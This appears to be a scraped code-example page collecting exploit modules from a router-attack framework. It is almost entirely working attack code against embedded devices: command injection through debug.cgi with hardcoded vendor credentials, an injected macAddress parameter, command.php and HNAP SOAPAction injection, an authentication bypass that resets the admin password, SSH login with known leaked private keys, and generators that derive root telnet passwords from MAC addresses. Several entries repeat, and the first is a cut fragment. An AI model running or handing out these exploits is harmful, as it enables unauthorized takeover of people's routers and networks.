                   }
        try:
            print_warning("Sending exploit")
            response = requests.post(url, headers=headers, data=payload, timeout=60)
            if "<report>OK</report>" in response.text:
                print_success("output not available this is blind injection")
            else:
                print_error("could not find marker in response, exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
Esempio n. 45
0
    def do_run(self, e):
        mac = self.mac
        mac = mac.upper()
        mac = mac.replace("-", "")
        mac = mac.replace(":", "")

        password = [c for c in "00000000"]
        mac = [c.lower() for c in mac]

        password[0] = self.mash(mac[5], mac[11])
        password[1] = self.mash(mac[0], mac[2])
        password[2] = self.mash(mac[10], mac[11])
        password[3] = self.mash(mac[0], mac[9])
        password[4] = self.mash(mac[10], mac[6])
        password[5] = self.mash(mac[3], mac[9])
        password[6] = self.mash(mac[1], mac[6])
        password[7] = self.mash(mac[3], mac[4])
        password = "".join(p for p in password)

        print_success("")
        print_green("Telnet password for root is: " + password)
Esempio n. 46
0
    def do_run(self, e):
        mac_array = self.mac.split(":")
        counter = 0
        for i in mac_array:
            mac_array[counter] = int(i, 16)
            counter += 1

        counter = 0
        while counter < 5:
            char = mac_array[counter] + mac_array[counter + 1]
            self.printchar(char)
            counter += 1

        counter = 0
        while counter < 3:
            char = mac_array[counter] + mac_array[counter + 1] + 0xF
            self.printchar(char)
            counter += 1
        print_success('credentials generated')
        print("Username: __super")
        print("Password: " + self.password)
Esempio n. 47
0
    def do_run(self, e):
        mac_array = self.mac.split(":")
        counter = 0
        for i in mac_array:
            mac_array[counter] = int(i, 16)
            counter += 1

        counter = 0
        while counter < 5:
            char = mac_array[counter] + mac_array[counter+1]
            self.printchar(char)
            counter += 1

        counter = 0
        while counter < 3:
            char = mac_array[counter] + mac_array[counter+1] + 0xF
            self.printchar(char)
            counter += 1
        print_success('')
        print_green("Username: __super")
        print_green("Password: " + self.password)
Esempio n. 48
0
    def do_run(self, e):
        mac = self.mac
        mac = mac.upper()
        mac = mac.replace("-", "")
        mac = mac.replace(":", "")

        password = [c for c in "00000000"]
        mac = [c.lower() for c in mac]

        password[0] = self.mash(mac[5], mac[11])
        password[1] = self.mash(mac[0], mac[2])
        password[2] = self.mash(mac[10], mac[11])
        password[3] = self.mash(mac[0], mac[9])
        password[4] = self.mash(mac[10], mac[6])
        password[5] = self.mash(mac[3], mac[9])
        password[6] = self.mash(mac[1], mac[6])
        password[7] = self.mash(mac[3], mac[4])
        password = "".join(p for p in password)

        print_success("")
        print_green("Telnet password for root is: " + password)
Esempio n. 49
0
    def do_run(self, e):
        url = "http://%s:%s/debug.cgi" % (self.host, self.port)
        data = {"data1": "echo 741852", "command": "ui_debug"}

        try:
            response = requests.post(url=url, data=data, auth=("Gemtek", "gemtekswd"), timeout=60)
            result = re.findall("<textarea rows=30 cols=100>\\n(.*)\\n</textarea>", response.text)
            if "741852" == result[0]:
                print_success("Target is vulnerable")
                data = {"data1": self.command, "command": "ui_debug"}
                response = requests.post(url=url, data=data, auth=("Gemtek", "gemtekswd"), timeout=60)
                result = re.findall("<textarea rows=30 cols=100>\\n(.*)\\n</textarea>", response.text)
                print(result[0])
            else:
                print_error("target is not vulnerable")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
        except TypeError:
            print_error("Something went wrong in answer parsing")
Esempio n. 50
0
 def do_run(self, e):
     file = ""
     for file in self.files:
         print_info("Testing file: " + file)
         url = "http://%s:%s/%s?writeData=true&reginfo=0&macAddress= 001122334455 -c 0 ;" \
               "%s; echo #" % (self.host, self.port, file, "sleep 10")
         try:
             print_info("Doing timebased check with sleep 10")
             time_start = datetime.datetime.now()
             response = requests.get(url=url, timeout=60)
             time_end = datetime.datetime.now()
             delta = time_end - time_start
             if response.status_code == 200 and "Update Success!" in response.text:
                 if 13 > delta.seconds > 9:
                     print_success("Timebased check OK target should be vulnerable")
                 else:
                     print_warning("Timebased check failed, but target still might be vulnerable")
                 break
         except requests.Timeout:
             print_error("timeout")
         except requests.ConnectionError:
             print_error("exploit failed")
     print_success("Vulnerable file:" + file)
     print_info("Sending command")
     url = "http://%s:%s/%s?writeData=true&reginfo=0&macAddress= 001122334455 -c 0 ;" \
           "%s; echo #" % (self.host, self.port, file, self.command)
     try:
         response = requests.get(url=url, timeout=60)
         if response.status_code == 200 and "Update Success!" in response.text:
             print_success("command sent")
     except requests.Timeout:
         print_error("timeout")
     except requests.ConnectionError:
         print_error("target stopped responding or you issued reboot or killed lighttpd")
Esempio n. 51
0
    def do_run(self, e):
        url = "http://%s:%s/command.php" % (self.host, self.port)

        payload = {'cmd': '%s; echo end' % self.command}
        headers = {
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
        }
        try:
            print_yellow("Sending exploit")
            # Requests forces URI encoding and can't be turned off
            # so we have to prepare HTTP request manually and modify it with urllib.parse.quote before sending
            request = requests.Request('POST',
                                       url,
                                       headers=headers,
                                       data=payload)
            r = request.prepare()
            # print("Before modification:", r.body)
            r.body = urllib.parse.quote('cmd=%s; echo end' % self.command,
                                        safe='/=')
            r.headers.update({'Content-Length': len(r.body)})
            # print("After modification:", r.body)
            s = requests.Session()
            response = s.send(r, timeout=15)
            s.close()
            # This won't work
            # response = requests.post(url, headers=headers, data=payload, proxies=proxies, timeout=60)
            if "end" in response.text:  # end8758 is unique tag to search for in output
                print_success("output of %s:" % self.command)
                print_green(response.text)
            else:
                print_error(
                    "could not find marker in response, exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed or you killed httpd")
Esempio n. 52
0
 def do_run(self, e):
     print_info("Testing known keys")
     client = paramiko.SSHClient()
     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
     connection = core.loader.open_database("./databases/bad_keys.db")
     cursor = connection.cursor()
     cursor.execute(
         "SELECT user, port, filename, type, private_key FROM keys;")
     entries = cursor.fetchall()
     for entry in entries:
         try:
             username = entry[0]
             port = entry[1]
             filename = entry[2]
             key_type = entry[3]
             string_key = entry[4]
             if key_type == 'RSA':
                 private_key = paramiko.RSAKey.from_private_key(
                     io.StringIO(string_key))
             elif key_type == 'DSA':
                 private_key = paramiko.DSSKey.from_private_key(
                     io.StringIO(string_key))
             else:
                 print_error("Failed to load key of type:", key_type)
                 continue
             client.connect(self.host,
                            port=port,
                            username=username,
                            pkey=private_key,
                            look_for_keys=False,
                            timeout=10)
             core.io.writetextfile(string_key, filename + ".key")
             print_success("Username:"******"port:", port)
             print_info("Private key writen to:", filename + ".key")
             client.close()
         except paramiko.AuthenticationException:
             pass
         except:
             pass
Esempio n. 53
0
    def do_run(self, e):
        url = "http://%s:%s/HNAP1" % (self.host, self.port)

        headers = {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % self.command}
        try:
            print_yellow("Sending exploit")
            requests.post(url, headers=headers, timeout=60)
            print_yellow("HTTPd is still responding this is OK if you changed the payload")
        except requests.ConnectionError:
            print_success("exploit sent.")
            answer = query_yes_no("Do you wish to dump all system settings? (if telned was started)")
            if answer is True:
                tn = telnetlib.Telnet(self.host, self.port)
                print_yellow("Sending command through telnet")
                tn.read_until(b'#', timeout=15)
                tn.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n")
                response = tn.read_until(b'#', timeout=15)
                tn.close()
                print_yellow("Writing response to config.xml")
                writetextfile(response.decode('ascii'), "config.xml")
                print_yellow("Don't forget to restart httpd or reboot the device")
        except requests.Timeout:
            print_error("timeout")
Esempio n. 54
0
    def do_run(self, e):
        url = "http://%s:%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" % (self.host, self.port)

        try:
            print_warning("Sending exploit")
            response = requests.get(url, timeout=60)
            if response.status_code == 200 and 'name="admin_password1"' in response.text:
                print_success("target seems vulnerable")
                print_success("You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL")
                print_info("Changing admin password")
                headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                           'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
                           'Accept-Encoding': 'gzip, deflate',
                           'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
                           }
                payload = {'NO_NEED_AUTH': 1,
                           'AUTH_GROUP': 0,
                           'ACTION_POST': 1,
                           'apply': 'Save+Settings',
                           'admin_name': 'admin',
                           'admin_password1': '%s' % self.password,
                           'admin_password2': '%s' % self.password,
                           'grap_auth_enable_h': 0,
                           'rt_ipaddr': '0.0.0.0'}
                url = "http://%s:%s/tools_admin.php" % (self.host, self.port)
                response = requests.post(url=url, headers=headers, data=payload, timeout=60)
                if response.status_code == 200:
                    print_success("password seems to be changed try to login with: %s" % self.password)
                else:
                    print_error("password change failed")

            else:
                print_error("exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")